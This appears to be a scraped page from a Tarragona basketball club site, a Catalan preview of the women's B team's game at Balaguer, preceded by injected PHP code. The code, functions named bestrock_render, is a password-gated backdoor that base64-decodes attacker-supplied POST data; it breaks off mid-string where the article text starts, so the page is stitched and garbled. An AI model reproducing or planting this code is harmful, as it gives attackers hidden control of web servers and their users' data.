function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet B, que es troba en un moment de joc òptim, visita el Balaguer (dissabte, 18.30 h) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet B, que es troba en un moment de joc òptim, visita el Balaguer (dissabte, 18.30 h)

By
Updated: gener 22, 2016

Com es pot ser optimista si no has guanyat cap partit en tota la temporada? La resposta no és senzilla però val a dir que, si en algun moment del curs el Tarragona Fem Bàsquet B ha pogut sumar el primer triomf de la campanya, és ara. De fet, va acaronar la glòria la setmana passada contra el Reus Deportiu (58-63) però 7 triples de les visitants en poc més de deu minuts van destrossar les aspiracions d’un conjunt, el lila, que havia dominat per 14 punts al descans (40-26) oferint un molt bon joc.

Amb les bones sensacions del joc de fa set dies, el Tarragona Fem Bàsquet B visita demà (18.30 h) el Balaguer, onzè classificat amb un balanç de 5 victòries i 9 derrotes. “Hem d’aconseguir jugar com ho van fer durant els vint primers minuts contra el Reus. A més, hem de resistir quan patim una davallada i, d’aquesta manera, tenir possibilitats de victòria”, explica el tècnic Fernando Arias que assegura que s’ha treballat l’aspecte anímic perquè “algunes jugadores facin un pas endavant en els moments difícils”.

Arias no podrà comptar amb Anna Garcia -convocada amb el sènior A- i Júlia Gómez. “El Balaguer és un equip que juga ràpid i un bon un contra un. Controlar el ritme de joc és la clau”, diu.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *